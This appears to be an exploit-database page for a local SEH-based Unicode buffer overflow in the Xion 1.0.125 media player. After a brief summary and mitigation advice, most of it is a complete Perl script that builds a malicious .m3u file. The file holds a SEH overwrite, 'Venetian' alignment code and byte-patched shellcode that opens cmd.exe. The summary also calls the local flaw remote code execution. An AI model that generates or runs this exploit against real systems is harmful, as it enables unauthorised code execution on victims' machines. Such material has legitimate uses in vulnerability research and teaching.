Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit

vendor:

Xion

by:

James Anderson (synthetic)

7.5

CVSS

HIGH

Execute Code, Overflow UTF-16LE buffer, Memory corruption

CWE

Product Name: Xion

Affected Version From: Xion 1.0.125

Affected Version To: Xion 1.0.125

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2018

Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit

The exploit allows for the execution of arbitrary code by exploiting a buffer overflow vulnerability in Xion 1.0.125 when processing a .m3u file. The exploit leverages a SEH-based Unicode technique to corrupt memory and execute malicious code. The vulnerability is caused by a lack of proper input validation, allowing an attacker to overwrite the SEH frame and gain control of the program's execution flow. This can lead to remote code execution or a denial of service.

Mitigation:

To mitigate this vulnerability, it is recommended to update Xion to the latest version or apply any available patches or security updates. Additionally, practicing secure coding practices, such as input validation and proper error handling, can help prevent buffer overflow vulnerabilities.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# ########################################################################
# Title:                Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit
# Vulnerability Type:   Execute Code, Overflow UTF-16LE buffer, Memory corruption
# Date:                 Feb 18, 2018
# Author:               James Anderson (synthetic)
# Original Advisory:    http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31
# Exploit mitigation:   There is no /SAFESEH, SEHOP, /GS, DEP, ASLR
# About:		The technique is taken from that paper: Creating Arbitrary Shellcode In Unicode Expanded Strings Chris Anley
# Tested on:            Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32
# ########################################################################
#                   _   _          _   _      
#   ___ _   _ _ __ | |_| |__   ___| |_(_) ___ 
#  / __| | | | '_ \| __| '_ \ / _ \ __| |/ __|
#  \__ \ |_| | | | | |_| | | |  __/ |_| | (__ 
#  |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___|
#	|___/                                         
#
# ########################################################################
                                          
 my $path = "/media/s4/DragonR.m3u";

 my $buffer_length = 5000;
 my $suboffset = 0x104;
 my $NOP1 = "\x6F"; # add [edi], ch
 my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx

 # [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame
 my $crash = "A" x 260;
 # [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame
 $crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH; popad puts an address close to the buffer in EAX
 $crash .= "\x79\x41"; # pop r32 pop r32 ret; SEh. address for no /SAFESEH / SEHOP, DEP, ASLR

 my $offset_to_payload = length($crash);

 # [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ settingcode. 
	# [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode]
 	$crash .= $NOP1; # NOP-eq
 	$crash .= "\x6a\x59"; # push 0 # pop ecx
	$crash .= $NOP1; # NOP-eq
 	$crash .= "\x41"; # inc ecx
	$crash .= "\xCC"; # add ah, cl # eax = eax + 0x100
	$crash .= $NOP1; # NOP-eq
	$crash .= "\x41"; # inc ecx
	$crash .= "\xC8"; # add al, cl
	$crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC;

	# [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character 
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x3b\x41"; # mov edx, 41003b00
	$crash .= "\x30"; # add [eax],dh		 
	$crash .= $NOP1; # NOP-eq

	# [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00
	$crash .= "\x40"; # inc eax
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\xec\x41"; # mov edx, 4100ec00
	$crash .= "\x30"; # add [eax],dh		

	# [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x45\x41"; # mov edx, 41004500 
	$crash .= "\x30"; # add [eax],dh
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x46\x41"; # mov edx, 41004600 
	$crash .= "\x30"; # add [eax],dh

	# [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x68\x41"; # mov edx, 41006800 
	$crash .= "\x30"; # add [eax],dh 

	# [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x78\x41"; # mov edx, 41007800 
	$crash .= "\x30"; # add [eax],dh 

	# [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x2F\x41"; # mov edx, 41002F00 
	$crash .= "\x30"; # add [eax],dh 

	# [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x63\x41"; # mov edx, 41006300 
	$crash .= "\x30"; # add [eax],dh 

	# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x64\x41"; # mov edx, 41006400 
	$crash .= "\x30"; # add [eax],dh 

	# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x8d\x41"; # mov edx, 41008d00 
	$crash .= "\x30"; # add [eax],dh 

	# [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\xf8\x41"; # mov edx, 4100f800 
	$crash .= "\x30"; # add [eax],dh

	# [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\xb8\x41"; # mov edx, 4100b800 
	$crash .= "\x30"; # add [eax],dh

	# [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x49\x41"; # mov edx, 41004900 
	$crash .= "\x30"; # add [eax],dh
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x4A\x41"; # mov edx, 41004A00 
	$crash .= "\x30"; # add [eax],dh

	# [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\x77\x41"; # mov edx, 41007700 
	$crash .= "\x30"; # add [eax],dh

	# [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	$crash .= "\xC8"; # add al, cl # eq eax + 2
	$crash .= $NOP1; # NOP-eq
	$crash .= "\xba\xd0\x41"; # mov edx, 4100d000 
	$crash .= "\x30"; # add [eax],dh

 # [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe) 
	 						 # *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP
 $crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx
 $crash .= $NOP1."\x6A"; # NOP1 + NOP1-eq (push 0)


 # [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. left - ^jalousie; right - actual shellcode that will be crafted. CMD=cmd.exe
my $shellcode =
"\x50".	# "\x8b". #	# BAD BYTE
	# "\xec". # 0
"\x55".	# "\x55".
	# "\x8b". # 0	# BAD BYTE  
"\xec".	# "\xec".
	# "\x68". # 0
"\x65".	# "\x65".
	# "\x78". # 0
"\x65".	# "\x65".
	# "\x2F". # 0
"\x68".	# "\x68".
	# "\x63". # 0
"\x6d".	# "\x6d".
	# "\x64". # 0
"\x2e".	# "\x2e".
	# "\x8d". # 0
"\x45".	# "\x45".
	# "\xf8". # 0
"\x50".	# "\x50".
	# "\xb8". # 0
"\xc7".	# "\xc7".
	# "\x93". # 0	# BAD BYTE  
"\xc2".	# "\xc2".
	# "\x77". # 0
"\xff";	# "\xff".
	# "\xd0"; # 0

 $crash .= $shellcode;

 $crash .= "C" x ($buffer_length - length($crash));
 open(myfile, ">$path"); 
 print myfile $crash;